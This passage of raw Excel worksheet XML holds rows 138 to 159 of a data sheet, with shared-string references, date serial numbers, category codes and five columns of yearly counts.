      <c r="B138" s="51">
        <v>44172.692372048608</v>
      </c>
      <c r="C138" s="1" t="s">
        <v>1457</v>
      </c>
      <c r="D138" s="43">
        <v>103</v>
      </c>
      <c r="E138" s="1" t="s">
        <v>1466</v>
      </c>
      <c r="F138" s="26">
        <v>102</v>
      </c>
      <c r="G138" s="1" t="s">
        <v>1467</v>
      </c>
      <c r="H138" s="1" t="s">
        <v>1468</v>
      </c>
      <c r="I138" s="16" t="s">
        <v>268</v>
      </c>
      <c r="J138" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K138" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L138" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M138" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N138" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O138" s="1"/>
      <c r="P138" s="1"/>
      <c r="Q138" s="1" t="s">
        <v>3543</v>
      </c>
      <c r="R138" s="83">
        <v>46259</v>
      </c>
      <c r="S138" s="83">
        <v>43849</v>
      </c>
      <c r="T138" s="83">
        <v>37500</v>
      </c>
      <c r="U138" s="83">
        <v>36910</v>
      </c>
      <c r="V138" s="83">
        <v>48779</v>
      </c>
      <c r="W138" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="139" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A139" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B139" s="51">
        <v>44335.700018101852</v>
      </c>
      <c r="C139" s="1" t="s">
        <v>1465</v>
      </c>
      <c r="D139" s="43">
        <v>103</v>
      </c>
      <c r="E139" s="1" t="s">
        <v>1471</v>
      </c>
      <c r="F139" s="26">
        <v>103</v>
      </c>
      <c r="G139" s="1" t="s">
        <v>1472</v>
      </c>
      <c r="H139" s="1" t="s">
        <v>1473</v>
      </c>
      <c r="I139" s="16" t="s">
        <v>268</v>
      </c>
      <c r="J139" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K139" s="1" t="s">
        <v>12</v>
      </c>
      <c r="L139" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M139" s="1" t="s">
        <v>622</v>
      </c>
      <c r="N139" s="1" t="s">
        <v>623</v>
      </c>
      <c r="O139" s="1"/>
      <c r="P139" s="1"/>
      <c r="Q139" s="1" t="s">
        <v>3543</v>
      </c>
      <c r="R139" s="83">
        <v>46404</v>
      </c>
      <c r="S139" s="83">
        <v>45021</v>
      </c>
      <c r="T139" s="83">
        <v>39019</v>
      </c>
      <c r="U139" s="83">
        <v>37089</v>
      </c>
      <c r="V139" s="83">
        <v>48918</v>
      </c>
      <c r="W139" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="140" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A140" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B140" s="51">
        <v>44314.65871935185</v>
      </c>
      <c r="C140" s="1" t="s">
        <v>1463</v>
      </c>
      <c r="D140" s="43">
        <v>103</v>
      </c>
      <c r="E140" s="1" t="s">
        <v>1474</v>
      </c>
      <c r="F140" s="26">
        <v>111</v>
      </c>
      <c r="G140" s="1" t="s">
        <v>1475</v>
      </c>
      <c r="H140" s="1" t="s">
        <v>1476</v>
      </c>
      <c r="I140" s="16" t="s">
        <v>268</v>
      </c>
      <c r="J140" s="1" t="s">
        <v>566</v>
      </c>
      <c r="K140" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L140" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M140" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N140" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O140" s="1" t="s">
        <v>1477</v>
      </c>
      <c r="P140" s="1" t="s">
        <v>567</v>
      </c>
      <c r="Q140" s="1" t="s">
        <v>3540</v>
      </c>
      <c r="R140" s="83">
        <v>4</v>
      </c>
      <c r="S140" s="83">
        <v>1036</v>
      </c>
      <c r="T140" s="83">
        <v>18729</v>
      </c>
      <c r="U140" s="83">
        <v>19696</v>
      </c>
      <c r="V140" s="83">
        <v>28966</v>
      </c>
      <c r="W140" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="141" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A141" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B141" s="51">
        <v>44085.746830324075</v>
      </c>
      <c r="C141" s="1" t="s">
        <v>1478</v>
      </c>
      <c r="D141" s="26">
        <v>101</v>
      </c>
      <c r="E141" s="1" t="s">
        <v>1479</v>
      </c>
      <c r="F141" s="26">
        <v>101</v>
      </c>
      <c r="G141" s="57" t="s">
        <v>1480</v>
      </c>
      <c r="H141" s="1" t="s">
        <v>1481</v>
      </c>
      <c r="I141" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J141" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K141" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L141" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M141" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N141" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O141" s="1"/>
      <c r="P141" s="1"/>
      <c r="Q141" s="1" t="s">
        <v>1482</v>
      </c>
      <c r="R141" s="83">
        <v>460</v>
      </c>
      <c r="S141" s="83">
        <v>303</v>
      </c>
      <c r="T141" s="83">
        <v>292</v>
      </c>
      <c r="U141" s="83">
        <v>817</v>
      </c>
      <c r="V141" s="83">
        <v>636</v>
      </c>
      <c r="W141" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="142" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A142" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B142" s="51">
        <v>44489.987387673609</v>
      </c>
      <c r="C142" s="1" t="s">
        <v>1478</v>
      </c>
      <c r="D142" s="26">
        <v>205</v>
      </c>
      <c r="E142" s="1" t="s">
        <v>1479</v>
      </c>
      <c r="F142" s="26">
        <v>202</v>
      </c>
      <c r="G142" s="57" t="s">
        <v>1480</v>
      </c>
      <c r="H142" s="1" t="s">
        <v>1483</v>
      </c>
      <c r="I142" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J142" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K142" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L142" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M142" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N142" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O142" s="1"/>
      <c r="P142" s="1"/>
      <c r="Q142" s="1" t="s">
        <v>3544</v>
      </c>
      <c r="R142" s="83">
        <v>460</v>
      </c>
      <c r="S142" s="83">
        <v>303</v>
      </c>
      <c r="T142" s="83">
        <v>292</v>
      </c>
      <c r="U142" s="83">
        <v>817</v>
      </c>
      <c r="V142" s="83">
        <v>636</v>
      </c>
      <c r="W142" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="143" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A143" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B143" s="51">
        <v>44489.987387673609</v>
      </c>
      <c r="C143" s="1" t="s">
        <v>1478</v>
      </c>
      <c r="D143" s="43">
        <v>300</v>
      </c>
      <c r="E143" s="1" t="s">
        <v>1479</v>
      </c>
      <c r="F143" s="26">
        <v>300</v>
      </c>
      <c r="G143" s="1" t="s">
        <v>1480</v>
      </c>
      <c r="H143" s="1" t="s">
        <v>1483</v>
      </c>
      <c r="I143" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J143" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K143" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L143" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M143" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N143" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O143" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P143" s="1"/>
      <c r="Q143" s="1" t="s">
        <v>3545</v>
      </c>
      <c r="R143" s="83">
        <v>460</v>
      </c>
      <c r="S143" s="83">
        <v>303</v>
      </c>
      <c r="T143" s="83">
        <v>292</v>
      </c>
      <c r="U143" s="83">
        <v>817</v>
      </c>
      <c r="V143" s="83">
        <v>636</v>
      </c>
      <c r="W143" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="144" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A144" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B144" s="51">
        <v>44085.746830312499</v>
      </c>
      <c r="C144" s="1" t="s">
        <v>1478</v>
      </c>
      <c r="D144" s="26">
        <v>101</v>
      </c>
      <c r="E144" s="1" t="s">
        <v>1486</v>
      </c>
      <c r="F144" s="26">
        <v>101</v>
      </c>
      <c r="G144" s="57" t="s">
        <v>1487</v>
      </c>
      <c r="H144" s="1" t="s">
        <v>1488</v>
      </c>
      <c r="I144" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J144" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K144" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L144" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M144" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N144" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O144" s="1"/>
      <c r="P144" s="1"/>
      <c r="Q144" s="1" t="s">
        <v>1482</v>
      </c>
      <c r="R144" s="83">
        <v>35557207</v>
      </c>
      <c r="S144" s="83">
        <v>30989380</v>
      </c>
      <c r="T144" s="83">
        <v>34232079</v>
      </c>
      <c r="U144" s="83">
        <v>29950100</v>
      </c>
      <c r="V144" s="83">
        <v>36910813</v>
      </c>
      <c r="W144" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="145" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A145" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B145" s="51">
        <v>44489.98738766204</v>
      </c>
      <c r="C145" s="1" t="s">
        <v>1478</v>
      </c>
      <c r="D145" s="26">
        <v>205</v>
      </c>
      <c r="E145" s="1" t="s">
        <v>1486</v>
      </c>
      <c r="F145" s="26">
        <v>205</v>
      </c>
      <c r="G145" s="57" t="s">
        <v>1487</v>
      </c>
      <c r="H145" s="1" t="s">
        <v>1488</v>
      </c>
      <c r="I145" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J145" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K145" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L145" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M145" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N145" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O145" s="1"/>
      <c r="P145" s="1"/>
      <c r="Q145" s="1" t="s">
        <v>3544</v>
      </c>
      <c r="R145" s="83">
        <v>35557207</v>
      </c>
      <c r="S145" s="83">
        <v>30989380</v>
      </c>
      <c r="T145" s="83">
        <v>34232079</v>
      </c>
      <c r="U145" s="83">
        <v>29950100</v>
      </c>
      <c r="V145" s="83">
        <v>36910813</v>
      </c>
      <c r="W145" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="146" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A146" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B146" s="51">
        <v>44489.98738766204</v>
      </c>
      <c r="C146" s="1" t="s">
        <v>1478</v>
      </c>
      <c r="D146" s="43">
        <v>300</v>
      </c>
      <c r="E146" s="1" t="s">
        <v>1486</v>
      </c>
      <c r="F146" s="26">
        <v>300</v>
      </c>
      <c r="G146" s="1" t="s">
        <v>1487</v>
      </c>
      <c r="H146" s="1" t="s">
        <v>1488</v>
      </c>
      <c r="I146" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J146" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K146" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L146" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M146" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N146" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O146" s="1" t="s">
        <v>111</v>
      </c>
      <c r="P146" s="1"/>
      <c r="Q146" s="1" t="s">
        <v>3545</v>
      </c>
      <c r="R146" s="83">
        <v>35557207</v>
      </c>
      <c r="S146" s="83">
        <v>30989380</v>
      </c>
      <c r="T146" s="83">
        <v>34232079</v>
      </c>
      <c r="U146" s="83">
        <v>29950100</v>
      </c>
      <c r="V146" s="83">
        <v>36910813</v>
      </c>
      <c r="W146" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="147" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A147" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B147" s="51">
        <v>44033.617680509262</v>
      </c>
      <c r="C147" s="1" t="s">
        <v>1489</v>
      </c>
      <c r="D147" s="43">
        <v>110</v>
      </c>
      <c r="E147" s="1" t="s">
        <v>1490</v>
      </c>
      <c r="F147" s="26">
        <v>100</v>
      </c>
      <c r="G147" s="1" t="s">
        <v>1491</v>
      </c>
      <c r="H147" s="1" t="s">
        <v>1492</v>
      </c>
      <c r="I147" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J147" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K147" s="1" t="s">
        <v>31</v>
      </c>
      <c r="L147" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M147" s="1" t="s">
        <v>262</v>
      </c>
      <c r="N147" s="1" t="s">
        <v>263</v>
      </c>
      <c r="O147" s="1"/>
      <c r="P147" s="1"/>
      <c r="Q147" s="1" t="s">
        <v>1493</v>
      </c>
      <c r="R147" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="S147" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="T147" s="83" t="e">
        <v>#N/A</v>
      </c>
      <c r="U147" s="83">
        <v>2</v>
      </c>
      <c r="V147" s="83">
        <v>5</v>
      </c>
      <c r="W147" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="148" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A148" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B148" s="51">
        <v>44489.686027048614</v>
      </c>
      <c r="C148" s="1" t="s">
        <v>1494</v>
      </c>
      <c r="D148" s="43">
        <v>100</v>
      </c>
      <c r="E148" s="1" t="s">
        <v>1495</v>
      </c>
      <c r="F148" s="26">
        <v>100</v>
      </c>
      <c r="G148" s="1" t="s">
        <v>1496</v>
      </c>
      <c r="H148" s="1" t="s">
        <v>1497</v>
      </c>
      <c r="I148" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J148" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K148" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L148" s="77" t="s">
        <v>83</v>
      </c>
      <c r="M148" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N148" s="1" t="s">
        <v>522</v>
      </c>
      <c r="O148" s="1"/>
      <c r="P148" s="1"/>
      <c r="Q148" s="1" t="s">
        <v>523</v>
      </c>
      <c r="R148" s="83">
        <v>24</v>
      </c>
      <c r="S148" s="83">
        <v>32</v>
      </c>
      <c r="T148" s="83">
        <v>27</v>
      </c>
      <c r="U148" s="83">
        <v>25</v>
      </c>
      <c r="V148" s="83">
        <v>89</v>
      </c>
      <c r="W148" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="149" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A149" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B149" s="51">
        <v>44504.903723078707</v>
      </c>
      <c r="C149" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="D149" s="43">
        <v>1115</v>
      </c>
      <c r="E149" s="1" t="s">
        <v>1503</v>
      </c>
      <c r="F149" s="26">
        <v>109</v>
      </c>
      <c r="G149" s="1" t="s">
        <v>1504</v>
      </c>
      <c r="H149" s="1" t="s">
        <v>1505</v>
      </c>
      <c r="I149" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J149" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K149" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L149" s="49" t="s">
        <v>77</v>
      </c>
      <c r="M149" s="1" t="s">
        <v>509</v>
      </c>
      <c r="N149" s="1" t="s">
        <v>510</v>
      </c>
      <c r="O149" s="1" t="s">
        <v>1506</v>
      </c>
      <c r="P149" s="1"/>
      <c r="Q149" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="R149" s="83">
        <v>2979</v>
      </c>
      <c r="S149" s="83">
        <v>2784</v>
      </c>
      <c r="T149" s="83">
        <v>2427</v>
      </c>
      <c r="U149" s="83">
        <v>2131</v>
      </c>
      <c r="V149" s="83">
        <v>2366</v>
      </c>
      <c r="W149" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="150" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A150" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B150" s="51">
        <v>44524.712880925923</v>
      </c>
      <c r="C150" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="D150" s="43">
        <v>1115</v>
      </c>
      <c r="E150" s="1" t="s">
        <v>1508</v>
      </c>
      <c r="F150" s="26">
        <v>118</v>
      </c>
      <c r="G150" s="1" t="s">
        <v>1509</v>
      </c>
      <c r="H150" s="1" t="s">
        <v>1510</v>
      </c>
      <c r="I150" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J150" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K150" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L150" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M150" s="1" t="s">
        <v>509</v>
      </c>
      <c r="N150" s="1" t="s">
        <v>510</v>
      </c>
      <c r="O150" s="1"/>
      <c r="P150" s="1"/>
      <c r="Q150" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="R150" s="83">
        <v>2988425</v>
      </c>
      <c r="S150" s="83">
        <v>2847085</v>
      </c>
      <c r="T150" s="83">
        <v>2758550</v>
      </c>
      <c r="U150" s="83">
        <v>2702883</v>
      </c>
      <c r="V150" s="83">
        <v>3044197</v>
      </c>
      <c r="W150" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="151" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A151" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B151" s="51">
        <v>44406.751182349537</v>
      </c>
      <c r="C151" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="D151" s="43">
        <v>1115</v>
      </c>
      <c r="E151" s="1" t="s">
        <v>1511</v>
      </c>
      <c r="F151" s="26">
        <v>109</v>
      </c>
      <c r="G151" s="1" t="s">
        <v>1512</v>
      </c>
      <c r="H151" s="1" t="s">
        <v>1513</v>
      </c>
      <c r="I151" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J151" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K151" s="3" t="s">
        <v>27</v>
      </c>
      <c r="L151" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M151" s="1" t="s">
        <v>509</v>
      </c>
      <c r="N151" s="1" t="s">
        <v>510</v>
      </c>
      <c r="O151" s="1"/>
      <c r="P151" s="1"/>
      <c r="Q151" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="R151" s="83">
        <v>110726</v>
      </c>
      <c r="S151" s="83">
        <v>123853</v>
      </c>
      <c r="T151" s="83">
        <v>102481</v>
      </c>
      <c r="U151" s="83">
        <v>115036</v>
      </c>
      <c r="V151" s="83">
        <v>122307</v>
      </c>
      <c r="W151" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="152" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A152" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B152" s="51">
        <v>44525.73112019676</v>
      </c>
      <c r="C152" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="D152" s="43">
        <v>1115</v>
      </c>
      <c r="E152" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="F152" s="26">
        <v>1012</v>
      </c>
      <c r="G152" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="H152" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="I152" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J152" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K152" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L152" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M152" s="1" t="s">
        <v>509</v>
      </c>
      <c r="N152" s="1" t="s">
        <v>510</v>
      </c>
      <c r="O152" s="1" t="s">
        <v>1517</v>
      </c>
      <c r="P152" s="1"/>
      <c r="Q152" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="R152" s="83">
        <v>12165</v>
      </c>
      <c r="S152" s="83">
        <v>13378</v>
      </c>
      <c r="T152" s="83">
        <v>18385</v>
      </c>
      <c r="U152" s="83">
        <v>17411</v>
      </c>
      <c r="V152" s="83">
        <v>21476</v>
      </c>
      <c r="W152" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="153" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A153" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B153" s="51">
        <v>44504.903723043979</v>
      </c>
      <c r="C153" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="D153" s="43">
        <v>1115</v>
      </c>
      <c r="E153" s="1" t="s">
        <v>1518</v>
      </c>
      <c r="F153" s="26">
        <v>103</v>
      </c>
      <c r="G153" s="1" t="s">
        <v>1519</v>
      </c>
      <c r="H153" s="1" t="s">
        <v>1520</v>
      </c>
      <c r="I153" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J153" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K153" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L153" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M153" s="1" t="s">
        <v>509</v>
      </c>
      <c r="N153" s="1" t="s">
        <v>510</v>
      </c>
      <c r="O153" s="1"/>
      <c r="P153" s="1"/>
      <c r="Q153" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="R153" s="83">
        <v>812</v>
      </c>
      <c r="S153" s="83">
        <v>5734</v>
      </c>
      <c r="T153" s="83">
        <v>1540</v>
      </c>
      <c r="U153" s="83">
        <v>2081</v>
      </c>
      <c r="V153" s="83">
        <v>15679</v>
      </c>
      <c r="W153" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="154" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A154" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B154" s="51">
        <v>44622.698677766202</v>
      </c>
      <c r="C154" s="1" t="s">
        <v>1521</v>
      </c>
      <c r="D154" s="26">
        <v>101</v>
      </c>
      <c r="E154" s="1" t="s">
        <v>1522</v>
      </c>
      <c r="F154" s="26">
        <v>101</v>
      </c>
      <c r="G154" s="1" t="s">
        <v>1523</v>
      </c>
      <c r="H154" s="1" t="s">
        <v>1524</v>
      </c>
      <c r="I154" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J154" s="1" t="s">
        <v>438</v>
      </c>
      <c r="K154" s="1" t="s">
        <v>27</v>
      </c>
      <c r="L154" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M154" s="1" t="s">
        <v>509</v>
      </c>
      <c r="N154" s="1" t="s">
        <v>510</v>
      </c>
      <c r="O154" s="1" t="s">
        <v>1525</v>
      </c>
      <c r="P154" s="1"/>
      <c r="Q154" s="1" t="s">
        <v>3547</v>
      </c>
      <c r="R154" s="83">
        <v>257824</v>
      </c>
      <c r="S154" s="83">
        <v>232178</v>
      </c>
      <c r="T154" s="83">
        <v>197494</v>
      </c>
      <c r="U154" s="83">
        <v>155211</v>
      </c>
      <c r="V154" s="83">
        <v>158834</v>
      </c>
      <c r="W154" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="155" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A155" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B155" s="51">
        <v>44504.903723020834</v>
      </c>
      <c r="C155" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="D155" s="43">
        <v>1115</v>
      </c>
      <c r="E155" s="1" t="s">
        <v>1527</v>
      </c>
      <c r="F155" s="26">
        <v>105</v>
      </c>
      <c r="G155" s="1" t="s">
        <v>1528</v>
      </c>
      <c r="H155" s="1" t="s">
        <v>1529</v>
      </c>
      <c r="I155" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J155" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K155" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L155" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M155" s="1" t="s">
        <v>475</v>
      </c>
      <c r="N155" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O155" s="1"/>
      <c r="P155" s="1"/>
      <c r="Q155" s="1" t="s">
        <v>3546</v>
      </c>
      <c r="R155" s="83">
        <v>24196</v>
      </c>
      <c r="S155" s="83">
        <v>22051</v>
      </c>
      <c r="T155" s="83">
        <v>22952</v>
      </c>
      <c r="U155" s="83">
        <v>19328</v>
      </c>
      <c r="V155" s="83">
        <v>22712</v>
      </c>
      <c r="W155" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="156" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A156" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B156" s="51">
        <v>44105.684892442128</v>
      </c>
      <c r="C156" s="1" t="s">
        <v>1558</v>
      </c>
      <c r="D156" s="43">
        <v>103</v>
      </c>
      <c r="E156" s="1" t="s">
        <v>1559</v>
      </c>
      <c r="F156" s="26">
        <v>103</v>
      </c>
      <c r="G156" s="1" t="s">
        <v>1548</v>
      </c>
      <c r="H156" s="1" t="s">
        <v>1560</v>
      </c>
      <c r="I156" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J156" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K156" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L156" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M156" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N156" s="2" t="s">
        <v>221</v>
      </c>
      <c r="O156" s="1" t="s">
        <v>1561</v>
      </c>
      <c r="P156" s="1" t="s">
        <v>222</v>
      </c>
      <c r="Q156" s="1" t="s">
        <v>3548</v>
      </c>
      <c r="R156" s="83">
        <v>735631</v>
      </c>
      <c r="S156" s="83">
        <v>669335</v>
      </c>
      <c r="T156" s="83">
        <v>665532</v>
      </c>
      <c r="U156" s="83">
        <v>594540</v>
      </c>
      <c r="V156" s="83">
        <v>744336</v>
      </c>
      <c r="W156" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="157" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A157" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B157" s="51">
        <v>44180.61579708333</v>
      </c>
      <c r="C157" s="1" t="s">
        <v>1563</v>
      </c>
      <c r="D157" s="43">
        <v>102</v>
      </c>
      <c r="E157" s="1" t="s">
        <v>1564</v>
      </c>
      <c r="F157" s="26">
        <v>102</v>
      </c>
      <c r="G157" s="1" t="s">
        <v>1565</v>
      </c>
      <c r="H157" s="1" t="s">
        <v>1566</v>
      </c>
      <c r="I157" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J157" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K157" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L157" s="17" t="s">
        <v>77</v>
      </c>
      <c r="M157" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N157" s="1" t="s">
        <v>221</v>
      </c>
      <c r="O157" s="1" t="s">
        <v>1567</v>
      </c>
      <c r="P157" s="1"/>
      <c r="Q157" s="1" t="s">
        <v>3549</v>
      </c>
      <c r="R157" s="83">
        <v>901</v>
      </c>
      <c r="S157" s="83">
        <v>815</v>
      </c>
      <c r="T157" s="83">
        <v>721</v>
      </c>
      <c r="U157" s="83">
        <v>703</v>
      </c>
      <c r="V157" s="83">
        <v>3070</v>
      </c>
      <c r="W157" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="158" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A158" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B158" s="51">
        <v>44180.615797106482</v>
      </c>
      <c r="C158" s="1" t="s">
        <v>1563</v>
      </c>
      <c r="D158" s="43">
        <v>102</v>
      </c>
      <c r="E158" s="1" t="s">
        <v>1569</v>
      </c>
      <c r="F158" s="26">
        <v>102</v>
      </c>
      <c r="G158" s="1" t="s">
        <v>1570</v>
      </c>
      <c r="H158" s="1" t="s">
        <v>1571</v>
      </c>
      <c r="I158" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J158" s="1" t="s">
        <v>1572</v>
      </c>
      <c r="K158" s="16" t="s">
        <v>33</v>
      </c>
      <c r="L158" s="16" t="s">
        <v>83</v>
      </c>
      <c r="M158" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N158" s="1"/>
      <c r="O158" s="1" t="s">
        <v>1573</v>
      </c>
      <c r="P158" s="1"/>
      <c r="Q158" s="1" t="s">
        <v>3549</v>
      </c>
      <c r="R158" s="83">
        <v>901</v>
      </c>
      <c r="S158" s="83">
        <v>810</v>
      </c>
      <c r="T158" s="83">
        <v>724</v>
      </c>
      <c r="U158" s="83">
        <v>720</v>
      </c>
      <c r="V158" s="83">
        <v>3027</v>
      </c>
      <c r="W158" s="1" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="159" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A159" s="1" t="s">
        <v>4</v>
      </c>
      <c r="B159" s="51">
        <v>44431.622155011573</v>
      </c>
      <c r="C159" s="1" t="s">
        <v>1574</v>
      </c>
      <c r="D159" s="43">
        <v>131</v>
      </c>
